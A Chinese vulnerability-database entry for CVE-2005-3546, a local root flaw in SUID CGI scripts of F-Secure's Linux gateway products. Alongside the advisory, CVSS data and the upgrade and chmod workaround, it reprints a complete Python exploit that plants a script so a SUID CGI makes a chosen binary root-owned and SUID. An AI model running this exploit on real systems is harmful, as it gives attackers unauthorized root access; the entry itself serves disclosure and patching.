CVE-2005-3546
CVSS7.2
发布时间 :2005-11-16 02:42:00
修订时间 :2011-03-07 21:26:45
NMCOES    

[原文]suid.cgi scripts in F-Secure (1) Internet Gatekeeper for Linux before 2.15.484 and (2) Anti-Virus Linux Gateway before 2.16 are installed SUID with world-executable permissions, which allows local users to gain privilege.


[CNNVD]F-Secure Anti-Virus Gatekeeper for Linux和F-Secure Anti-Virus Gateway for Linux本地权限提升漏洞(CNNVD-200511-172)

        F-Secure Internet Gatekeeper for Linux 和Anti-Virus Linux Gateway 都是反病毒软件。
        F-Secure (1) Internet Gatekeeper for Linux 2.15.484之前版本和(2) Anti-Virus Linux Gateway 2.16之前版本中的suid.cgi脚本,安装了所有用户都有执行权限的SUID,这可让本地用户获得特权。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:f-secure:internet_gatekeeper:::linux
cpe:/a:f-secure:f-secure_anti-virus:::linux_gateways

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3546
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3546
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-172
(官方数据源) CNNVD

- 其它链接及资源

http://www.f-secure.com/security/fsc-2005-3.shtml
(VENDOR_ADVISORY)  CONFIRM  http://www.f-secure.com/security/fsc-2005-3.shtml
http://secunia.com/advisories/17467
(VENDOR_ADVISORY)  SECUNIA  17467
http://www.vupen.com/english/advisories/2005/2331
(UNKNOWN)  VUPEN  ADV-2005-2331
http://xforce.iss.net/xforce/xfdb/22966
(UNKNOWN)  XF  fsecure-scripts-root-privileges(22966)
http://www.securityfocus.com/bid/15339
(UNKNOWN)  BID  15339
http://www.osvdb.org/20552
(UNKNOWN)  OSVDB  20552
http://www.osvdb.org/20551
(UNKNOWN)  OSVDB  20551
http://www.osvdb.org/20550
(UNKNOWN)  OSVDB  20550
http://www.osvdb.org/20549
(UNKNOWN)  OSVDB  20549
http://www.osvdb.org/20548
(UNKNOWN)  OSVDB  20548
http://www.osvdb.org/20547
(UNKNOWN)  OSVDB  20547
http://www.osvdb.org/20546
(UNKNOWN)  OSVDB  20546
http://www.osvdb.org/20545
(UNKNOWN)  OSVDB  20545
http://www.osvdb.org/20544
(UNKNOWN)  OSVDB  20544
http://www.osvdb.org/20543
(UNKNOWN)  OSVDB  20543
http://www.osvdb.org/20542
(UNKNOWN)  OSVDB  20542
http://www.osvdb.org/20541
(UNKNOWN)  OSVDB  20541
http://www.osvdb.org/20540
(UNKNOWN)  OSVDB  20540
http://www.osvdb.org/20539
(UNKNOWN)  OSVDB  20539
http://www.osvdb.org/20538
(UNKNOWN)  OSVDB  20538
http://www.osvdb.org/20537
(UNKNOWN)  OSVDB  20537
http://www.osvdb.org/20513
(UNKNOWN)  OSVDB  20513
http://securitytracker.com/id?1015160
(UNKNOWN)  SECTRACK  1015160
http://securitytracker.com/id?1015159
(UNKNOWN)  SECTRACK  1015159

- 漏洞信息

F-Secure Anti-Virus Gatekeeper for Linux和F-Secure Anti-Virus Gateway for Linux本地权限提升漏洞
高危 设计错误
2005-11-16 00:00:00 2005-11-16 00:00:00
本地  
        F-Secure Internet Gatekeeper for Linux 和Anti-Virus Linux Gateway 都是反病毒软件。
        F-Secure (1) Internet Gatekeeper for Linux 2.15.484之前版本和(2) Anti-Virus Linux Gateway 2.16之前版本中的suid.cgi脚本,安装了所有用户都有执行权限的SUID,这可让本地用户获得特权。

- 公告与补丁

        暂无数据

- 漏洞信息 (1297)

F-Secure Internet Gatekeeper for linux < 2.15.484 Local Root Exploit (EDBID:1297)
linux local
2005-11-07 Verified
0 Xavier de Leon
N/A [点击下载]
#!/usr/bin/env python
#
# F-Secure Anti-Virus Internet Gatekeeper for Linux <2.15.484 
# F-Secure Anti-Virus Linux Gateway <2.16 # added line 3-4 for references /str0ke
#
##############################################################################
##  fsigk_exp.py: F-Secure Internet Gatekeeper for Linux local root exploit
##  acknowledgements: everyone in pure-elite and uDc.
##
##  coded by: xavier@tigerteam.se [http://xavsec.blogspot.com]
##############################################################################

##############################################################################
##  Make proper checks and import nessesary calls from modules.
##

try: 
    from sys import argv
except Exception: 
    print "the 'sys' module could not be loaded"
    raise SystemExit

try: 
    from os import unlink, stat, error, symlink, system, chmod
except Exception:
     print "the 'os' module could not be loaded"
     raise SystemExit

try: 
    import getopt
except Exception: 
    print "the 'getopt' module could not be loaded"
    raise SystemExit

##############################################################################
##  Constants.
##

__program__ = argv[0]
__version__ = "0.1beta"
__author__ = "<xavier@tigerteam.se>"
__lastedit__ = "Thu Sep 22 23:18:39 EDT 2005"
__usage__ = """usage: %s [-options]

options:
       --version  show program's version number and exit.
      -h, --help  show this help message and exit.

      -s, --suid  file location to suid.
       -d, --dir  cgi directory.
     -c, --clean  cleans any left over files from the environment creation.
              -#  enter numerical value of vulnerable file to exploit. [list below]

 1: ifconfig_suid.cgi  |  2: reboot_suid.cgi     |  3: proxy_suid.cgi
 4: edittmpl_suid.cgi  |  5: version_suid.cgi    |  6: hostname_suid.cgi
 7: gateway_suid.cgi   |  8: halt_suid.cgi       |  9: edituserdb_suid.cgi
10: htpasswd_suid.cgi  | 11: pattern_up_suid.cgi | 12: license_suid.cgi
13: iptables_suid.cgi  | 14: dns_suid.cgi        | 15: pattern_autoup_suid.cgi
16: spam_list_suid.cgi | 17: diag_suid.cgi""" % (__program__)

#######################################################################################
## Functions.
##

def _write(file, payload):
    try: 
        open(file, 'w').write(payload)
        chmod(file, 0100)
    except Exception, err: 
        print ("[-] %s" % (err))

def _exists(path):
    try: 
        stat(path)
    except error:
        return False
    return True

def _handleopts():
    for opt in argv[1:]:
        if opt in ("-h", "--help"): 
            print "%s" % (__usage__),
            raise SystemExit
        if opt in ("-v", "--version"): 
            print "%s (%s)" % (__version__, __lastedit__),
            raise SystemExit

    _method_ = 'ifconfig_suid.cgi'
    _file_ = 'ifconfig.cgi'
    for opt in argv[1:]:
        if opt == "-1": 
            _method_ = 'ifconfig_suid.cgi'
        elif opt == "-2": 
            _method_ = 'reboot_suid.cgi'
            _file_ = 'reboot.cgi'
        elif opt == "-3": 
            _method_ = 'proxy_suid.cgi'
            _file_ = 'proxy.cgi'
        elif opt == "-4": 
            _method_ = 'edittmpl_suid.cgi'
            _file_ = 'edittmpl.cgi'
        elif opt == "-5": 
            _method_ = 'version_suid.cgi'
            _file_ = 'version.cgi'
        elif opt == "-6": 
            _method_ = 'hostname_suid.cgi'
            _file_ = 'hostname.cgi'
        elif opt == "-7": 
            _method_ = 'gateway_suid.cgi'
            _file_ = 'gateway.cgi'
        elif opt == "-8": 
            _method_ = 'halt_suid.cgi'
            _file_ = 'halt.cgi'
        elif opt == "-9": 
            _method_ = 'edituserdb_suid.cgi'
            _file_ = 'edituserdb.cgi'
        elif opt == "-10": 
            _method_ = 'htpasswd_suid.cgi'
            _file_ = 'htpasswd.cgi'
        elif opt == "-11": 
            _method_ = 'pattern_up_suid.cgi'
            _file_ = 'pattern_up.cgi'
        elif opt == "-12": 
            _method_ = 'license_suid.cgi'
            _file_ = 'license.cgi'
        elif opt == "-13":
            _method_ = 'iptables_suid.cgi'
            _file_ = 'iptables.cgi'
        elif opt == "-14": 
            _method_ = 'dns_suid.cgi'
            _file_ = 'dns.cgi'
        elif opt == "-15": 
            _method_ = 'pattern_autoup_suid.cgi'
            _file_ = 'pattern_autoup.cgi'
        elif opt == "-16": 
            _method_ = 'spam_list_suid.cgi'
            _file_ = 'spam_list.cgi'
        elif opt == "-17": 
            _method_ = 'diag_suid.cgi'
            _file_ = 'diag.cgi'
        else: 
            pass

    try:
        opts = getopt.getopt(argv[1:], 'c1234567890s:d:', ['clean', \
                                                          'suid=', \
                                                          'dir='])[0]
    except Exception, (err):
        print "[-] %s" % (err),
        raise SystemExit

    _dir_ = None
    _payload_ = None
    _combine_ = None

    for o, a in opts:
        if o in ("-c", "--clean"): 
            _clean()
            print "[*] done"
            raise SystemExit
        if o in ("-d", "--dir"): 
            if _exists(a): 
                _dir_ = a
            else: 
                print "[-] unable to access the %s directory" % (_dir_),
                raise SystemExit
        if o in ("-s", "--suid"): 
            if _exists(a): 
                _payload_ = _suid(a)
            else: 
                print "[-] unable to access binary."
                raise SystemExit

    if _dir_ == None: 
        print "[-] no directory was given [try -h for help menu]"
        raise SystemExit
    if _payload_ == None: 
        print "[-] enter binary to suid [try -h for help menu]"
        raise SystemExit
    _combined_ = "%s/%s" % (_dir_, _method_)
    if not _exists(_combined_): 
        print "[-] method not possible, try another."
        raise SystemExit

    print "[*] creating environment..."
    try:
        symlink('%s/%s' % (_dir_, _method_), 'runbad')
        _write(_file_, _payload_)
    except Exception, err:
        raise SystemExit


def _suid(file):
    _suid_ = """#!/bin/sh
chown 0.0 %(file)s
chmod 4755 %(file)s
""" % (locals())
    return _suid_


def _clean():
    try:
        files = ['runbad', 'ifconfig.cgi', 'reboot.cgi', 'proxy.cgi', 
                 'edittmpl.cgi', 'version.cgi', 'hostname.cgi', 'gateway.cgi',
                 'halt.cgi', 'edituserdb.cgi', 'htpasswd.cgi', 'pattern_up.cgi',
                 'license.cgi', 'iptables.cgi', 'dns.cgi', 'pattern_autoup.cgi', 
                 'spam_list.cgi', 'diag_suid.cgi']

        for file in files:
            if _exists(file): unlink(file)

    except Exception, err:
        print "[-] %s" % (err),


##############################################################################
##  main() // main code.
##

def main():
    try:
        print "[INFO] F-Secure Internet Gatekeeper for Linux <=2.10-431 local exploit by %s" % (__author__)
        print "[*] handling options, arguments..."
        _handleopts()
        print "[*] executing exploit..."
        system('./runbad')
        print "[*] cleaning..."
        _clean()
        print "[*] done... try executing the specified binary."
    except KeyboardInterrupt:
        print "[-] caught keyboard interuption"
        raise SystemExit
    except Exception, (err): 
        _clean()
        raise SystemExit

if __name__ == '__main__': main()

# milw0rm.com [2005-11-07]
		

- 漏洞信息

20513
F-Secure Anti-Virus Internet Gatekeeper/Linux Gateway ifconfig_suid.cgi Local Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

F-Secure Anti-Virus Internet Gatekeeper for Linux and F-Secure Anti-Virus Linux Gateway contain a flaw that may allow a malicious local user to elevate privileges to root. The issue is triggered when a user creates a malicious script named ifconfig.cgi in the current working directory, and executes the SUID script ifconfig_suid.cgi using its full path. The SUID script will execute the malicious script because it looks for it in the working directory. This flaw may lead to a loss of integrity.

- 时间线

2005-11-07 2005-09-29
Unknow Unknow

- 解决方案

Upgrade F-Secure Anti-Virus Internet Gatekeeper for Linux to version 2.15.484 or higher. Upgrade F-Secure Anti-Virus Linux Gateway to version 2.16 or higher, as these updates have been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: For F-Secure Internet Gatekeeper for Linux: "chmod -s /opt/f-secure/fsigk/cgi/*suid.cgi" For F-Secure Anti-Virus Linux Gateway: "chmod -s /home/virusgw/cgi/*suid.cgi"

- 相关参考

- 漏洞作者

- 漏洞信息

F-Secure Anti-Virus Gatekeeper and Gateway for Linux Local Privilege Escalation Vulnerability
Design Error 15339
No Yes
2005-11-07 12:00:00 2007-02-20 09:26:00
Tigerteam.se Security reported this issue to the vendor.

- 受影响的程序版本

F-Secure Internet Gatekeeper for Linux
F-Secure Anti-Virus for Linux Gateways
F-Secure Internet Gatekeeper for Linux 2.15.484
F-Secure Anti-Virus for Linux Gateways 2.16

- 不受影响的程序版本

F-Secure Internet Gatekeeper for Linux 2.15.484
F-Secure Anti-Virus for Linux Gateways 2.16

- 漏洞讨论

F-Secure Anti-Virus products are prone to a local privilege-escalation vulnerability because of insecure setuid-superuser binary permissions.

Exploiting this vulnerability allows local attackers to gain superuser privileges, leading to a complete compromise of the affected computer.

- 漏洞利用

An exploit is not required.

The following proof of concept (fsigk_exp.py) has been provided by <xavier@tigerteam.se>.

- 解决方案

The vendor has released an advisory along with fixes to address this issue. Please see the referenced advisory for information on obtaining fixes.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站